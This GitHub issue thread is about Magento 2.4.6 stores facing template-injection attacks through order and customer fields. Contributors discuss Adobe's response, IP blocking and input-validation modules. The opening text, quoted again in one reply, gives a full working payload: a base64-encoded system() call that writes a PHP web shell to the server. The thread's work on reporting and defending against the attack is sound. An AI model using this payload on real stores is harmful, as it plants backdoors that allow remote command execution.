{{var this.getTemplateFilter().filter(dummy) }}{{var this.getTemplateFilter().addAfterFilterCallback(base64_decode).addAfterFilterCallback(system).filter(ZWNobyAnPD9waHAgJHY9KCRfR0VUWyJhIl0pO0BzeXN0ZW0oJHYpOycgPmFwaXMucGhw)}} {{var this.getTemplateFilter().filter(dummy) }}{{var this.getTemplateFilter().addAfterFilterCallback(base64_decode).addAfterFilterCallback(system).filter(ZWNobyAnPD9waHAgJHY9KCRfR0VUWyJhIl0pO0BzeXN0ZW0oJHYpOycgPmFwaXMucGhw)}}

Magento (Commerce Cloud 2.4.6-p6) returns a 400 Bad Request error with the message "malformed request".

The Aug security patch hasn't been applied yet.

This error shows for both the frontend and the API and stops the order from being placed.

Last week, I could still replicate this issue in the STG environment.

Probably the Adobe Cloud team applied Fastly rules just now.

Update
The Adobe team has confirmed they've done nothing, as this is not considered a bug.
They recommend blocking suspicious IPs using Fastly.

@ssx
Contributor

ssx commented Aug 20, 2024

Just an update, today when I try to place an order with name/address fields {{var this.getTemplateFilter().filter(dummy) }}{{var this.getTemplateFilter().addAfterFilterCallback(base64_decode).addAfterFilterCallback(system).filter(ZWNobyAnPD9waHAgJHY9KCRfR0VUWyJhIl0pO0BzeXN0ZW0oJHYpOycgPmFwaXMucGhw)}} {{var this.getTemplateFilter().filter(dummy) }}{{var this.getTemplateFilter().addAfterFilterCallback(base64_decode).addAfterFilterCallback(system).filter(ZWNobyAnPD9waHAgJHY9KCRfR0VUWyJhIl0pO0BzeXN0ZW0oJHYpOycgPmFwaXMucGhw)}}

Magento (Commerce Cloud 2.4.6-p6) returns a 400 Bad Request error with the message "malformed request".

The Aug security patch hasn't been applied yet.

This error shows for both the frontend and the API and stops the order from being placed.

Last week, I could still replicate this issue in the STG environment.

Probably the Adobe Cloud team applied Fastly rules just now.

Yeah I'd imagine so, for our Commerce Cloud clients that's exactly how I did it too!

@Max-Leps

Max-Leps commented Aug 20, 2024

@bafmaamy

@ssx @RotzGott @Max-Leps Yea, It's a great idea everything to be validated.

Just finished the module. Now every field is protected.

https://github.com/bafmaamy/Magento-FieldValidator

Tested on 2.4.6

@in-session I really want to help about this, but not enough skills to touch the core of magento. Now the module validating fields of Order Creation, Customer Creation, Customer Name Update, Customer Address Update and save every unsuccessful attempt. Hope this can help.

Hello
Thank you for your effort.

I tested the module and I am still able to inject code during registration


Also I am not getting an email when it catches the injection attempt.

@bafmaamy

bafmaamy commented Aug 20, 2024

@Max-Leps yes, I forgot about state/region validation. Added in AddressSavePlugin.php:

// Validate State/Region
$region = $address->getRegion();
if ($region) {
    $this->validateInput($region->getRegion(), 'State/Region Name');
    $this->validateInput($region->getRegionCode(), 'State/Region Code');
    $this->validateInput($region->getRegionId(), 'State/Region ID');
}

and similar if statement in OrderSourceLogger.php

Check the updated files:
app/code/Bafmaamy/FieldValidator/Plugin/OrderSourceLogger.php
app/code/Bafmaamy/FieldValidator/Plugin/AddressSavePlugin.php

About the email notifications, please ensure that mailx is installed and configured correctly on your server. Try:
echo "Hello" | mailx -s 'Test' [email protected]
Then try with: mail, sendmail, or whatever mail service you are using.

@WaPoNe
Contributor

WaPoNe commented Aug 21, 2024

Based on https://github.com/bafmaamy/Magento-FieldValidator (great job @bafmaamy!) I've released a similar extension with these different features:

  • Configuration to enable/disable module;
  • Configuration to set the regular expression to reject input values;
  • Configuration to set the limit of characters to use only for the firstname and lastname fields validation;
  • Configuration to enable/disable invalidation fields results notification;
  • Configuration to set email addresses to receive invalidation fields results;
  • Use of Magento mail service;
  • Added other customer fields;
  • Use of an abstract class for all the Plugins.

The extension is available here: https://github.com/WaPoNe/module-input-fields-validator and it can be installed via composer:

composer require wapone/module-input-fields-validator

@Max-Leps

@WaPoNe

Based on https://github.com/bafmaamy/Magento-FieldValidator (great job @bafmaamy!) I've released a similar extension with these different features:

  • Configuration to enable/disable module;
  • Configuration to set the regular expression to reject input values;
  • Configuration to set the limit of characters to use only for the firstname and lastname fields validation;
  • Configuration to enable/disable invalidation fields results notification;
  • Configuration to set email addresses to receive invalidation fields results;
  • Use of Magento mail service;
  • Added other customer fields;
  • Use of an abstract class for all the Plugins.

The extension is available here: https://github.com/WaPoNe/module-input-fields-validator and it can be installed via composer:

composer require wapone/module-input-fields-validator

That's good but it is in conflict with the ebizmarts payment plugin
https://store.ebizmarts.com/opayo-sagepay-suite-pro-for-magento-2.html


When we enable that module, it stops working with all its extensions even when all the fields are filled in correctly

Cheers

@Max-Leps

@bafmaamy

@Max-Leps yes, forgot about state/region validation. Added in AddressSavePlugin.php :

// Validate State/Region
$region = $address->getRegion();
if ($region) {
    $this->validateInput($region->getRegion(), 'State/Region Name');
    $this->validateInput($region->getRegionCode(), 'State/Region Code');
    $this->validateInput($region->getRegionId(), 'State/Region ID');
}

and similar if statement in OrderSourceLogger.php

Check the updated files: app/code/Bafmaamy/FieldValidator/Plugin/OrderSourceLogger.php app/code/Bafmaamy/FieldValidator/Plugin/AddressSavePlugin.php

About the email notifications, please ensure that mailx is installed and configured correctly on your server. Try: echo "Hello" | mailx -s 'Test' [email protected] Then try with: mail, sendmail, or whatever mail service you are using.

Hi

IDK what you have changed recently but after all these changes it stopped working with the payment module
I mean this module: https://store.ebizmarts.com/opayo-sagepay-suite-pro-for-magento-2.html

So it's in conflict with that module.


Cheers

@bafmaamy

@Max-Leps There is a possibility that your payment module uses the same kind of validation for the region field, or that you have enabled both modules together, WaPoNe's and this one. Check the logs, the error is there.

Otherwise try the old version without the region validation:

In app/code/Bafmaamy/FieldValidator/Plugin/OrderSourceLogger.php comment lines from 60 to 65 and from 73 to 78.


then remove or comment out in AddressSavePlugin.php:

// Validate State/Region
$region = $address->getRegion();
if ($region) {
    $this->validateInput($region->getRegion(), 'State/Region Name');
    $this->validateInput($region->getRegionCode(), 'State/Region Code');
    $this->validateInput($region->getRegionId(), 'State/Region ID');
}


php bin/magento setup:di:compile

@frostitution

@ssx @jonaschen623 We are on cloud, where would we find these changes and if they are applied?

@jonaschen623

@ssx @jonaschen623 We are on cloud, where would we find these changes and if they are applied?

Adobe confirmed they haven't applied any change.

The only recommendation is blocking suspicious IPs using Fastly.

So I have no clue now. 😆

@crazytrace

crazytrace commented Aug 24, 2024

I am still waiting for the final solution for this issue; currently I am just blocking the routes to their IPv4/IPv6 addresses via iptables, and it seems everything has been in order these two weeks so far.

@in-session
Contributor

in-session commented Aug 24, 2024

OK, I've worked a little bit more on it; that should cover the most important things, but it's still in the test phase: #39030

Maybe someone would like to try it out.

@bafmaamy

bafmaamy commented Aug 24, 2024

gj, but "{" is still allowed in the Region field and Company field.

@Max-Leps

@in-session

OK, I've worked a little bit more on it; that should cover the most important things, but it's still in the test phase: #39030

Maybe someone would like to try it out.

Is it magento core changes?
But we already have 2 plugins for filtering all these fields.

@jsdupuis

@Max-Leps I am personally waiting for an official Magento core change, not a custom plugin. Input validation against code injection should be part of the Magento platform. We shouldn't have to install or buy an extension for this.

@in-session
Contributor

@Max-Leps
Yes, I am trying to bring the function into the core; as mentioned by jsdupuis, security-relevant functions should be integrated into the core. In my opinion, a plugin only makes sense here as a temporary solution. As I said, the current solution still has to go through all the tests, and I think it also makes sense to add the validation of all POST requests. This has also already been added to the merge: https://github.com/magento/magento2/pull/38345/files In my opinion, this is the right way to go. But I think the patterns are still not correct, and I have adapted them and made them globally available so that the fields can also be validated in other functions.

@Max-Leps

Max-Leps commented Sep 2, 2024

@in-session

Hello
Did they confirm this fix?

@in-session
Contributor

@Max-Leps
No, the pull request is in the test phase, as is another pull request, #39131. Whether a merge will ever come is always written in the stars, hence open source. And unfortunately I can't say whether Magento does anything here either. @engcom-Bravo https://jira.corp.adobe.com/browse/AC-12687. Is there anything new?

@Max-Leps

Hello

Any core fix for the issue so far?
